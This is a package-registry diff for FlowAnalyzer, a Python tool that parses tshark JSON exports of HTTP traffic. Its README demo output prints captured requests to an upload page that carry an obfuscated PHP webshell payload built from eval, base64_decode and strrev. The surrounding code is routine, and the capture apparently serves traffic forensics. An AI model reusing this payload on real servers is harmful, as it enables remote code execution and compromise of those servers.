FlowAnalyzer 0.2.9__tar.gz → 0.3.2__tar.gz
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/FlowAnalyzer/FlowAnalyzer.py +67 -47
- flowanalyzer-0.3.2/FlowAnalyzer.egg-info/PKG-INFO +84 -0
- flowanalyzer-0.3.2/PKG-INFO +84 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/setup.py +1 -1
- FlowAnalyzer-0.2.9/FlowAnalyzer.egg-info/PKG-INFO +0 -85
- FlowAnalyzer-0.2.9/PKG-INFO +0 -85
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/FlowAnalyzer/__init__.py +0 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/FlowAnalyzer/logging_config.py +0 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/FlowAnalyzer.egg-info/SOURCES.txt +0 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/FlowAnalyzer.egg-info/dependency_links.txt +0 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/FlowAnalyzer.egg-info/top_level.txt +0 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/LICENSE +0 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/README.md +0 -0
- {FlowAnalyzer-0.2.9 → flowanalyzer-0.3.2}/setup.cfg +0 -0
|
@@ -13,20 +13,21 @@ from .logging_config import configure_logger
|
|
|
13
13
|
|
|
14
14
|
logger = configure_logger("FlowAnalyzer", logging.INFO)
|
|
15
15
|
|
|
16
|
+
|
|
16
17
|
class Request(NamedTuple):
|
|
17
|
-
frame_num:
|
|
18
|
+
frame_num: int
|
|
18
19
|
header: bytes
|
|
19
20
|
file_data: bytes
|
|
20
|
-
full_uri:
|
|
21
|
-
time_epoch:
|
|
21
|
+
full_uri: str
|
|
22
|
+
time_epoch: float
|
|
22
23
|
|
|
23
24
|
|
|
24
25
|
class Response(NamedTuple):
|
|
25
|
-
frame_num:
|
|
26
|
+
frame_num: int
|
|
26
27
|
header: bytes
|
|
27
28
|
file_data: bytes
|
|
28
|
-
request_in:
|
|
29
|
-
time_epoch:
|
|
29
|
+
request_in: int
|
|
30
|
+
time_epoch: float
|
|
30
31
|
|
|
31
32
|
|
|
32
33
|
class HttpPair(NamedTuple):
|
|
@@ -65,6 +66,37 @@ class FlowAnalyzer:
|
|
|
65
66
|
if os.path.getsize(self.jsonPath) == 0:
|
|
66
67
|
raise ValueError("您的tshark导出的JSON文件内容为空!JSON路径:%s" % self.jsonPath)
|
|
67
68
|
|
|
69
|
+
def parse_packet(self, packet: dict) -> Tuple[int, int, float, str, str]:
|
|
70
|
+
"""解析Json中的关键信息字段
|
|
71
|
+
|
|
72
|
+
Parameters
|
|
73
|
+
----------
|
|
74
|
+
packet : dict
|
|
75
|
+
传入Json字典
|
|
76
|
+
|
|
77
|
+
Returns
|
|
78
|
+
-------
|
|
79
|
+
Tuple[int, int, float, str, str]
|
|
80
|
+
frame_num, request_in, time_epoch, full_uri, full_request
|
|
81
|
+
"""
|
|
82
|
+
# frame_num = int(packet["frame.number"][0]) if packet.get("frame.number") else None
|
|
83
|
+
# time_epoch = float(packet["frame.time_epoch"][0]) if packet.get("frame.time_epoch") else None
|
|
84
|
+
# full_uri = parse.unquote(packet["http.request.full_uri"][0]) if packet.get("http.request.full_uri") else None
|
|
85
|
+
|
|
86
|
+
frame_num = int(packet["frame.number"][0])
|
|
87
|
+
request_in = int(packet["http.request_in"][0]) if packet.get("http.request_in") else frame_num
|
|
88
|
+
full_uri = parse.unquote(packet["http.request.full_uri"][0])
|
|
89
|
+
time_epoch = packet["frame.time_epoch"][0]
|
|
90
|
+
|
|
91
|
+
if packet.get("tcp.reassembled.data"):
|
|
92
|
+
full_request = packet["tcp.reassembled.data"][0]
|
|
93
|
+
elif packet.get("tcp.payload"):
|
|
94
|
+
full_request = packet["tcp.payload"][0]
|
|
95
|
+
else:
|
|
96
|
+
# exported_pdu.exported_pdu
|
|
97
|
+
full_request = packet["exported_pdu.exported_pdu"][0]
|
|
98
|
+
return frame_num, request_in, time_epoch, full_uri, full_request
|
|
99
|
+
|
|
68
100
|
def parse_http_json(self) -> Tuple[Dict[int, Request], Dict[int, Response]]:
|
|
69
101
|
# sourcery skip: use-named-expression
|
|
70
102
|
"""解析JSON数据文件中的HTTP请求和响应信息
|
|
@@ -80,22 +112,7 @@ class FlowAnalyzer:
|
|
|
80
112
|
requests, responses = {}, {}
|
|
81
113
|
for packet in data:
|
|
82
114
|
packet = packet["_source"]["layers"]
|
|
83
|
-
|
|
84
|
-
|
|
85
|
-
if packet.get("tcp.reassembled.data"):
|
|
86
|
-
full_request = packet["tcp.reassembled.data"][0]
|
|
87
|
-
elif packet.get("tcp.payload"):
|
|
88
|
-
full_request = packet["tcp.payload"][0]
|
|
89
|
-
else:
|
|
90
|
-
# exported_pdu.exported_pdu
|
|
91
|
-
full_request = packet["exported_pdu.exported_pdu"][0]
|
|
92
|
-
|
|
93
|
-
frame_num = int(packet["frame.number"][0]) if packet.get("frame.number") else None
|
|
94
|
-
request_in = int(packet["http.request_in"][0]) if packet.get("http.request_in") else frame_num
|
|
95
|
-
full_uri = (
|
|
96
|
-
parse.unquote(packet["http.request.full_uri"][0]) if packet.get("http.request.full_uri") else None
|
|
97
|
-
)
|
|
98
|
-
|
|
115
|
+
frame_num, request_in, time_epoch, full_uri, full_request = self.parse_packet(packet)
|
|
99
116
|
header, file_data = self.extract_http_file_data(full_request)
|
|
100
117
|
|
|
101
118
|
if packet.get("http.response_number"):
|
|
@@ -145,24 +162,35 @@ class FlowAnalyzer:
|
|
|
145
162
|
def extract_json_file(fileName: str, display_filter: str, tshark_workDir: str) -> None:
|
|
146
163
|
# sourcery skip: replace-interpolation-with-fstring, use-fstring-for-formatting
|
|
147
164
|
# tshark -r {} -Y "{}" -T json -e http.request_number -e http.response_number -e http.request_in -e tcp.reassembled.data -e frame.number -e tcp.payload -e frame.time_epoch -e http.request.full_uri > output.json
|
|
148
|
-
|
|
149
|
-
|
|
150
|
-
|
|
151
|
-
|
|
152
|
-
|
|
153
|
-
|
|
154
|
-
|
|
155
|
-
|
|
156
|
-
|
|
157
|
-
|
|
158
|
-
|
|
159
|
-
|
|
160
|
-
|
|
161
|
-
))
|
|
165
|
+
|
|
166
|
+
command = [
|
|
167
|
+
"tshark", "-r", fileName,
|
|
168
|
+
"-Y", f"(tcp.reassembled_in) or ({display_filter})",
|
|
169
|
+
"-T", "json",
|
|
170
|
+
"-e", "http.request_number", "-e", "http.response_number", "-e", "http.request_in",
|
|
171
|
+
"-e", "tcp.reassembled.data", "-e", "frame.number", "-e", "tcp.payload",
|
|
172
|
+
"-e", "frame.time_epoch",
|
|
173
|
+
"-e", "exported_pdu.exported_pdu",
|
|
174
|
+
"-e", "http.request.full_uri",
|
|
175
|
+
">", "output.json",
|
|
176
|
+
]
|
|
177
|
+
|
|
162
178
|
_, stderr = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=tshark_workDir).communicate()
|
|
163
179
|
if stderr != b"" and b"WARNING" not in stderr:
|
|
164
180
|
print(f"[Waring/Error]: {stderr}")
|
|
165
181
|
|
|
182
|
+
@staticmethod
|
|
183
|
+
def move_and_addMD5Sum(tshark_jsonPath: str, jsonWordPath: str, MD5Sum: str) -> None:
|
|
184
|
+
if tshark_jsonPath != jsonWordPath:
|
|
185
|
+
shutil.move(tshark_jsonPath, jsonWordPath)
|
|
186
|
+
|
|
187
|
+
with open(jsonWordPath, "r", encoding="utf-8") as f:
|
|
188
|
+
data = json.load(f)
|
|
189
|
+
data[0]["MD5Sum"] = MD5Sum
|
|
190
|
+
|
|
191
|
+
with open(jsonWordPath, "w", encoding="utf-8") as f:
|
|
192
|
+
json.dump(data, f, indent=2)
|
|
193
|
+
|
|
166
194
|
@staticmethod
|
|
167
195
|
def get_json_data(filePath: str, display_filter: str) -> str:
|
|
168
196
|
# sourcery skip: replace-interpolation-with-fstring
|
|
@@ -193,20 +221,12 @@ class FlowAnalyzer:
|
|
|
193
221
|
if os.path.exists(jsonWordPath):
|
|
194
222
|
with open(jsonWordPath, "r", encoding="utf-8") as f:
|
|
195
223
|
data = json.load(f)
|
|
196
|
-
if data[0].get(
|
|
224
|
+
if data[0].get("MD5Sum") == MD5Sum:
|
|
197
225
|
logger.debug("匹配HASH校验无误,自动返回Json文件路径!")
|
|
198
226
|
return jsonWordPath
|
|
199
|
-
FlowAnalyzer.extract_json_file(fileName, display_filter, tshark_workDir)
|
|
200
227
|
|
|
201
|
-
|
|
202
|
-
|
|
203
|
-
|
|
204
|
-
with open(jsonWordPath, "r", encoding="utf-8") as f:
|
|
205
|
-
data = json.load(f)
|
|
206
|
-
data[0]['MD5Sum'] = MD5Sum
|
|
207
|
-
|
|
208
|
-
with open(jsonWordPath, "w", encoding="utf-8") as f:
|
|
209
|
-
json.dump(data, f, indent=2)
|
|
228
|
+
FlowAnalyzer.extract_json_file(fileName, display_filter, tshark_workDir)
|
|
229
|
+
FlowAnalyzer.move_and_addMD5Sum(tshark_jsonPath, jsonWordPath, MD5Sum)
|
|
210
230
|
return jsonWordPath
|
|
211
231
|
|
|
212
232
|
def Split_HTTP_headers(self, file_data: bytes) -> Tuple[bytes, bytes]:
|
|
@@ -0,0 +1,84 @@
|
|
|
1
|
+
Metadata-Version: 2.1
|
|
2
|
+
Name: FlowAnalyzer
|
|
3
|
+
Version: 0.3.2
|
|
4
|
+
Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
|
|
5
|
+
Home-page: https://github.com/Byxs20/FlowAnalyzer
|
|
6
|
+
Author: Byxs20
|
|
7
|
+
Author-email: 97766819@qq.com
|
|
8
|
+
Classifier: Development Status :: 3 - Alpha
|
|
9
|
+
Classifier: Intended Audience :: Developers
|
|
10
|
+
Classifier: License :: OSI Approved :: MIT License
|
|
11
|
+
Classifier: Programming Language :: Python :: 3
|
|
12
|
+
Classifier: Programming Language :: Python :: 3.6
|
|
13
|
+
Classifier: Programming Language :: Python :: 3.7
|
|
14
|
+
Classifier: Programming Language :: Python :: 3.8
|
|
15
|
+
Classifier: Programming Language :: Python :: 3.9
|
|
16
|
+
Description-Content-Type: text/markdown
|
|
17
|
+
License-File: LICENSE
|
|
18
|
+
|
|
19
|
+
# FlowAnalyzer
|
|
20
|
+
|
|
21
|
+
# Installation
|
|
22
|
+
|
|
23
|
+
Install the package using pip:
|
|
24
|
+
|
|
25
|
+
```
|
|
26
|
+
pip3 install FlowAnalyzer
|
|
27
|
+
```
|
|
28
|
+
|
|
29
|
+
```
|
|
30
|
+
pip3 install FlowAnalyzer -i https://pypi.org/simple
|
|
31
|
+
```
|
|
32
|
+
|
|
33
|
+
# Usage
|
|
34
|
+
|
|
35
|
+
请务必添加 `tshark.exe` 到环境变量,否则找不到会出错!
|
|
36
|
+
|
|
37
|
+
```
|
|
38
|
+
$ git clone https://github.com/Byxs20/FlowAnalyzer.git
|
|
39
|
+
$ cd ./FlowAnalyzer/
|
|
40
|
+
```
|
|
41
|
+
|
|
42
|
+
```python
|
|
43
|
+
# sourcery skip: use-fstring-for-formatting
|
|
44
|
+
import os
|
|
45
|
+
from FlowAnalyzer import FlowAnalyzer
|
|
46
|
+
|
|
47
|
+
|
|
48
|
+
baseDir = os.path.dirname(os.path.abspath(__file__))
|
|
49
|
+
flowPath = os.path.join(baseDir, "flow.pcapng")
|
|
50
|
+
display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"
|
|
51
|
+
|
|
52
|
+
jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
|
|
53
|
+
for count, http in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):
|
|
54
|
+
print(f"[+] 正在处理第{count}个HTTP流!")
|
|
55
|
+
|
|
56
|
+
request, response = http.request, http.response
|
|
57
|
+
if request:
|
|
58
|
+
request_num, header, file_data, time_epoch = request.frame_num, request.header, request.file_data, request.time_epoch
|
|
59
|
+
print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(request_num, header, file_data, time_epoch))
|
|
60
|
+
|
|
61
|
+
if response:
|
|
62
|
+
response_num, header, file_data, time_epoch = response.frame_num, response.header, response.file_data, response.time_epoch
|
|
63
|
+
print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(response_num, header, file_data, time_epoch))
|
|
64
|
+
```
|
|
65
|
+
|
|
66
|
+
```
|
|
67
|
+
$ python3 .\tests\demo.py
|
|
68
|
+
[+] 正在处理第1个HTTP流!
|
|
69
|
+
序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1403', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1YCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOQNpHlpcBNa5IHIHHrIHEy7jch%2Fv3Z2Y0lq8qSQQkYhwWZhxVpNq1liOGE%3D', 时间: 1682596262.982344
|
|
70
|
+
序号: 3请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:02 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'70\r\n72a9c691ccdaab98fL1tMGI4YTljMh76GrwuHij67J+qF+t2KR17BwHlSvtL1mdSPnoksIZRS0N0Xi89+zNlNaUo+3xjMTU=b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596262.992406
|
|
71
|
+
[+] 正在处理第2个HTTP流!
|
|
72
|
+
序号: 5请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1409', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1cCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOTReMrqj%2Fx6aH4XU%2BWInBcrzUhN6o%2FMfL54MmpIY6avwUcSIJBkZUuq7rVUYzE1', 时间: 1682596266.652869
|
|
73
|
+
序号: 6请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:06 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'40\r\n72a9c691ccdaab98fL1tMGI4YTljMh4dHdNjM6AJ3DZmOGE5b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596266.661427
|
|
74
|
+
[+] 正在处理第3个HTTP流!
|
|
75
|
+
序号: 8请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1427', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTL1ACWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOSdqCqaPC9ZW7GI7C2kIPd0MqlXzqT3svOl%2B1gNW3x0TL4%2BUQ0cdgeygrWzt1XSzu7opY93Nvl1tILnOWMx', 时间: 1682596308.573707
|
|
76
|
+
序号: 9请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:48 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'50\r\n72a9c691ccdaab98fL1tMGI4YTljMn75e3jORcmaTQZQeEdS2jE3TKPMeDNjNg==b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596308.582312
|
|
77
|
+
```
|
|
78
|
+
|
|
79
|
+
# Contributing
|
|
80
|
+
Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
|
|
81
|
+
|
|
82
|
+
# License
|
|
83
|
+
|
|
84
|
+
This project is licensed under the [MIT License.](LICENSE)
|
|
@@ -0,0 +1,84 @@
|
|
|
1
|
+
Metadata-Version: 2.1
|
|
2
|
+
Name: FlowAnalyzer
|
|
3
|
+
Version: 0.3.2
|
|
4
|
+
Summary: FlowAnalyzer是一个流量分析器,用于解析和处理tshark导出的JSON数据文件
|
|
5
|
+
Home-page: https://github.com/Byxs20/FlowAnalyzer
|
|
6
|
+
Author: Byxs20
|
|
7
|
+
Author-email: 97766819@qq.com
|
|
8
|
+
Classifier: Development Status :: 3 - Alpha
|
|
9
|
+
Classifier: Intended Audience :: Developers
|
|
10
|
+
Classifier: License :: OSI Approved :: MIT License
|
|
11
|
+
Classifier: Programming Language :: Python :: 3
|
|
12
|
+
Classifier: Programming Language :: Python :: 3.6
|
|
13
|
+
Classifier: Programming Language :: Python :: 3.7
|
|
14
|
+
Classifier: Programming Language :: Python :: 3.8
|
|
15
|
+
Classifier: Programming Language :: Python :: 3.9
|
|
16
|
+
Description-Content-Type: text/markdown
|
|
17
|
+
License-File: LICENSE
|
|
18
|
+
|
|
19
|
+
# FlowAnalyzer
|
|
20
|
+
|
|
21
|
+
# Installation
|
|
22
|
+
|
|
23
|
+
Install the package using pip:
|
|
24
|
+
|
|
25
|
+
```
|
|
26
|
+
pip3 install FlowAnalyzer
|
|
27
|
+
```
|
|
28
|
+
|
|
29
|
+
```
|
|
30
|
+
pip3 install FlowAnalyzer -i https://pypi.org/simple
|
|
31
|
+
```
|
|
32
|
+
|
|
33
|
+
# Usage
|
|
34
|
+
|
|
35
|
+
请务必添加 `tshark.exe` 到环境变量,否则找不到会出错!
|
|
36
|
+
|
|
37
|
+
```
|
|
38
|
+
$ git clone https://github.com/Byxs20/FlowAnalyzer.git
|
|
39
|
+
$ cd ./FlowAnalyzer/
|
|
40
|
+
```
|
|
41
|
+
|
|
42
|
+
```python
|
|
43
|
+
# sourcery skip: use-fstring-for-formatting
|
|
44
|
+
import os
|
|
45
|
+
from FlowAnalyzer import FlowAnalyzer
|
|
46
|
+
|
|
47
|
+
|
|
48
|
+
baseDir = os.path.dirname(os.path.abspath(__file__))
|
|
49
|
+
flowPath = os.path.join(baseDir, "flow.pcapng")
|
|
50
|
+
display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"
|
|
51
|
+
|
|
52
|
+
jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
|
|
53
|
+
for count, http in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):
|
|
54
|
+
print(f"[+] 正在处理第{count}个HTTP流!")
|
|
55
|
+
|
|
56
|
+
request, response = http.request, http.response
|
|
57
|
+
if request:
|
|
58
|
+
request_num, header, file_data, time_epoch = request.frame_num, request.header, request.file_data, request.time_epoch
|
|
59
|
+
print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(request_num, header, file_data, time_epoch))
|
|
60
|
+
|
|
61
|
+
if response:
|
|
62
|
+
response_num, header, file_data, time_epoch = response.frame_num, response.header, response.file_data, response.time_epoch
|
|
63
|
+
print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(response_num, header, file_data, time_epoch))
|
|
64
|
+
```
|
|
65
|
+
|
|
66
|
+
```
|
|
67
|
+
$ python3 .\tests\demo.py
|
|
68
|
+
[+] 正在处理第1个HTTP流!
|
|
69
|
+
序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1403', 文件: 